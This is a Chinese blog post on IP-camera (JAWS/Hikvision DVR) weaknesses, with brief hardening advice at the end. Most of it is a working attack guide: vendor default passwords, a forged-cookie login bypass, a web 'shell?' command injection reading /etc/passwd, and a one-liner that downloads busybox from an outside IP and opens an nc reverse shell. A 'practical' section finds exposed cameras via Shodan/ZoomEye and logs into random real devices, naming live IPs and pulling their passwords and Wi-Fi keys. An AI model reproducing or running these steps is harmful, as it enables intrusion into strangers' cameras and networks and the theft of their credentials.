<!DOCTYPE html>
<html lang="zh-CN">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="zhaijiahui">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="zhaijiahui">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>网络摄像头的安全问题 · 时光不改&#39;s 记忆碎片</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/dabai_favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >时光不改&#39;s 记忆碎片</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">网络摄像头的安全问题</a>
            </div>
    </div>
    
    <a class="home-link" href=/>时光不改's 记忆碎片</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            网络摄像头的安全问题
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.3k</span>阅读时长: <span class="post-count reading-time">5 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/08/21</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <p>网络摄像头（IP CAMERAS）在日常生活中越来越普及，交通路口抓取车牌号码，幼儿园用来监控小孩，小区车牌识别系统等等，这些摄像头会跟计算机或者录像等硬件设备连接，以便进行图像存储和及时浏览。很多摄像头还直接跟网络连接，以方便客户通过浏览器或者客户端进行连接管理和查看。商家的本意是为了方便用户进行查看，但很多网络摄像头由于厂商对安全重视不够，黑客通过技术手段可以很方便对存在漏洞的网络摄像头进行存取和浏览，在有些情况下，还可以获取网络摄像头所在服务器的权限，甚至可以渗透进入该摄像头所在网络，危害实在很大。</p>
<h1 id="一、存在漏洞分析"><a href="#一、存在漏洞分析" class="headerlink" title="一、存在漏洞分析"></a>一、存在漏洞分析</h1><p><a href="https://www.pentestpartners.com/blog/pwning-cctv-cameras/" target="_blank" rel="noopener">AndrewTierney在其Blog上公布了一片有关摄像头漏洞利用的文章</a>。<br>归纳其核心如下：</p>
<h2 id="1-存在弱口令漏洞"><a href="#1-存在弱口令漏洞" class="headerlink" title="1.存在弱口令漏洞"></a>1.存在弱口令漏洞</h2><p>   存在弱口令admin密码为空。收集的其它几款网络摄像机的口令如下：</p>
<p> （1）海康威视IP网络摄像机：超级用户：admin，超级用户密码：12345<br> （2）大华网络摄像机：用户名：admin，密码：888888<br> （3）天地伟业网络摄像机：用户名：Admin，密码：111111</p>
<h2 id="2-登录密码绕过漏洞"><a href="#2-登录密码绕过漏洞" class="headerlink" title="2.登录密码绕过漏洞"></a>2.登录密码绕过漏洞</h2><p>   我们可以对之前用默认密码成功登录的页面进行抓包，找到处理页面登录逻辑的js，对处理页面登录的逻辑分析发现，存在登录绕过漏洞，代码如下：<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$(<span class="built_in">document</span>).ready(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    dvr_camcnt= Cookies.get(<span class="string">"dvr_camcnt"</span>);</span><br><span class="line">    iSetAble= Cookies.get(<span class="string">"iSetAble"</span>);</span><br><span class="line">    iPlayBack= Cookies.get(<span class="string">"iPlayBack"</span>);</span><br><span class="line">    dvr_usr= Cookies.get(<span class="string">"dvr_usr"</span>);</span><br><span class="line">    dvr_pwd= Cookies.get(<span class="string">"dvr_pwd"</span>);</span><br><span class="line">    <span class="keyword">if</span>(iSetAble== <span class="string">'0'</span>)&#123;</span><br><span class="line">        $(<span class="string">'#pb_settings'</span>).css(<span class="string">'display'</span>,<span class="string">'none'</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    <span class="keyword">if</span>(iPlayBack== <span class="string">'0'</span>)&#123;</span><br><span class="line">        $(<span class="string">'#pb_review'</span>).css(<span class="string">'display'</span>,<span class="string">'none'</span>);</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">if</span>(dvr_camcnt== <span class="literal">null</span> || dvr_usr == <span class="literal">null</span> || dvr_pwd == <span class="literal">null</span>)&#123;</span><br><span class="line">        location.href= <span class="string">"/index.html"</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure></p>
<p>   系统管理页面直接通过js检查cookie是否为空来判断用户是否登录。现在竟然还有程序员这样来写登录状态判断。</p>
<p>   于是，通过伪造cookie便可以绕过登录检查。通过代码可以看到需要伪造三个cookie值，dvr_camcnt，dvr_usr=admin，dvr_pwd=123。直接打开<code>http://xx.xx.xx.xx/view2.html</code>时，抓包发现系统会自动设置该cookie参数的值，这个值需要记录下来，否则后面填错的话是看不到监控内容的。dvr_usr和dvr_pwd可以随便设置，只要不为空就好。保存后，重新刷新一下<code>http://xx.xx.xx.xx/view2.html</code>，便可以成功登录系统。</p>
<p>3.直接获取webshell及其root密码</p>
<p>   直接访问<code>http://www.antian365.com/shell?cat /etc/passwd</code>即可获取服务器root帐号密码，如图2所示。获取其root帐号密码为a03e3thxwWU0g，经破解其明文为“juantech”。</p>
<p>4.获取反弹shell</p>
<p>  执行以下命令：</p>
<p><code>cd /root/rec/a1 &amp;&amp; wget http://212.111.43.161/busybox &amp;&amp;chmod +xbusybox&amp;&amp; ./busybox  nc 122.115.47.39 8000 -e /bin/sh -e /bin/sh</code><br>  将反弹shell至122.115.47.39的8000端口。<br>  还可以执行命令<code>http://www.antian365.com/shell?/usr/sbin/telnetd-l/bin/sh -p 25</code>通过telnet 目标IP直接进入系统。</p>
<h1 id="二、实战演练"><a href="#二、实战演练" class="headerlink" title="二、实战演练"></a>二、实战演练</h1><p>1.确定网络摄像头关键字</p>
<p>在kaliLinux中打开bannergrab，填上设备的IP地址和web端口号</p>
<p>其中关键字为Server后的字符串<code>JAWS</code>。</p>
<p>观察HTTP BANNER为<code>DVRDVS-Webs</code>，点开后发现为hikvision摄像头的WEB端</p>
<p>2.快速获取存在的目标服务器</p>
<p>使用zoomeye进行检索，输入地址</p>
<p><code>https://www.zoomeye.org/search?q=JAWS</code> </p>
<p><code>http://www.zoomeye.org/search?q=DVRDVS-Webs</code></p>
<p>也可以使用shodan进行检索</p>
<p><code>https://www.shodan.io/search?query=JAWS%2F1.0</code></p>
<p>3.随机对目标进行访问</p>
<p>  在检索结果中随机对结果进行访问，打开访问登录框，用户名输入admin密码为空，直接登录系统，一般可以查看监控的房间和画面。</p>
<p>4.直接获取访问密码</p>
<p>  使用命令<code>shell?cat%20/tmp/usrm.ini</code>可以直接获取访问密码，例如<code>http://210.21.34.206/shell?cat%20/tmp/usrm.ini</code>可以获取默认管理员密码为空，如图6和图7所示。将默认密码进行修改后，重新访问，其密码已经写入到<code>/tmp/usrm.ini</code>文件中。</p>
<p>5.获取无线网络密码</p>
<p>   在其网络设置中可以直接获取其无线AP的名称及其密码<br>   <a href="http://210.21.34.206/view.html" target="_blank" rel="noopener">http://210.21.34.206/view.html</a></p>
<p>6.反弹shell测试</p>
<p>   对部分目标进行了反弹shell测试，均为成功，可能是无写权限，下载<code>http://212.111.43.161/busybox</code>文件大概需要100M。</p>
<h1 id="三、防范措施及建议"><a href="#三、防范措施及建议" class="headerlink" title="三、防范措施及建议"></a>三、防范措施及建议</h1><p>目前网上已经出现利用该漏洞恶意程序，而官方未发布相应补丁。用户可采取以下措施加固安全：</p>
<p>1.修改默认root密码为其他强健密码。<br>2.对外不提供web访问。或者将地址设置为一个复杂的名称，使其默认地址不被访问。<br>3.对服务器可写进行严格限制。<br>4.修改默认admin密码。</p>
<p>参考文章：</p>
<p>1.<a href="http://www.freebuf.com/tools/5950.html" target="_blank" rel="noopener">http://www.freebuf.com/tools/5950.html</a><br>2.<a href="http://www.ijiandao.com/safe/cto/5450.html" target="_blank" rel="noopener">http://www.ijiandao.com/safe/cto/5450.html</a><br>3.<a href="http://www.myhack58.com/Article/html/3/8/2015/64210.htm" target="_blank" rel="noopener">http://www.myhack58.com/Article/html/3/8/2015/64210.htm</a><br>4.<a href="http://hb.ifeng.com/3c/detail_2014_04/04/2083399_0.shtml" target="_blank" rel="noopener">http://hb.ifeng.com/3c/detail_2014_04/04/2083399_0.shtml</a><br>5.<a href="http://security.zol.com.cn/443/4439365_all.html" target="_blank" rel="noopener">http://security.zol.com.cn/443/4439365_all.html</a><br>6.<a href="http://bobao.360.cn/news/detail/1388.html" target="_blank" rel="noopener">http://bobao.360.cn/news/detail/1388.html</a><br>7.<a href="http://www.myhack58.com/Article/html/2/5/2015/58087.htm" target="_blank" rel="noopener">http://www.myhack58.com/Article/html/2/5/2015/58087.htm</a><br>8.<a href="http://drops.wooyun.org/category/papers" target="_blank" rel="noopener">http://drops.wooyun.org/category/papers</a></p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="https://zhaijiahui.github.io">zhaijiahui</a>
            <p>原文链接：<a href="https://zhaijiahui.github.io/2018/08/21/JAWS/">https://zhaijiahui.github.io/2018/08/21/JAWS/</a>
            <p>发表日期：<a href="https://zhaijiahui.github.io/2018/08/21/JAWS/">August 21st 2018, 11:47:44 pm</a>
            <p>更新日期：<a href="https://zhaijiahui.github.io/2018/08/21/JAWS/">June 6th 2019, 1:45:18 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2018/09/28/在github上搭建个人网站/" title= "在Github上搭建个人网站">
                    <div class="nextTitle">在Github上搭建个人网站</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2018/06/01/IDscan/" title= "IDscan 敏感文件扫描器">
                    <div class="prevTitle">IDscan 敏感文件扫描器</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:826806614@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/zhaijiahui" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#一、存在漏洞分析"><span class="toc-number">1.</span> <span class="toc-text">一、存在漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-存在弱口令漏洞"><span class="toc-number">1.1.</span> <span class="toc-text">1.存在弱口令漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-登录密码绕过漏洞"><span class="toc-number">1.2.</span> <span class="toc-text">2.登录密码绕过漏洞</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#二、实战演练"><span class="toc-number">2.</span> <span class="toc-text">二、实战演练</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#三、防范措施及建议"><span class="toc-number">3.</span> <span class="toc-text">三、防范措施及建议</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 9
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/09</span><a class="archive-post-title" href= "/2019/05/09/openvpn服务端安装/" >Ubuntu 18.04 下搭建openvpn</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/08</span><a class="archive-post-title" href= "/2019/05/08/shadowsocks服务端安装/" >Ubuntu 16.04下Shadowsocks服务器端安装及优化</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/10</span><a class="archive-post-title" href= "/2018/10/10/ecshop273/" >ECShop 2.7.3 SQL注入/代码执行漏洞分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/08</span><a class="archive-post-title" href= "/2018/10/08/PHP常见函数/" >PHP常见函数总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/07</span><a class="archive-post-title" href= "/2018/10/07/hexo的一些常规操作/" >Hexo的一些常规操作</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/07</span><a class="archive-post-title" href= "/2018/10/07/几个不错的hexo主题/" >几个不错的hexo主题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/28</span><a class="archive-post-title" href= "/2018/09/28/在github上搭建个人网站/" >在Github上搭建个人网站</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/21</span><a class="archive-post-title" href= "/2018/08/21/JAWS/" >网络摄像头的安全问题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/01</span><a class="archive-post-title" href= "/2018/06/01/IDscan/" >IDscan 敏感文件扫描器</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="TOOLS"><span class="iconfont-archer">&#xe606;</span>TOOLS</span>
    
        <span class="sidebar-tag-name" data-tags="PHP"><span class="iconfont-archer">&#xe606;</span>PHP</span>
    
        <span class="sidebar-tag-name" data-tags="NOTE"><span class="iconfont-archer">&#xe606;</span>NOTE</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="脚本工具"><span class="iconfont-archer">&#xe60a;</span>脚本工具</span>
    
        <span class="sidebar-category-name" data-categories="代码审计"><span class="iconfont-archer">&#xe60a;</span>代码审计</span>
    
        <span class="sidebar-category-name" data-categories="Hexo"><span class="iconfont-archer">&#xe60a;</span>Hexo</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "zhaijiahui"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


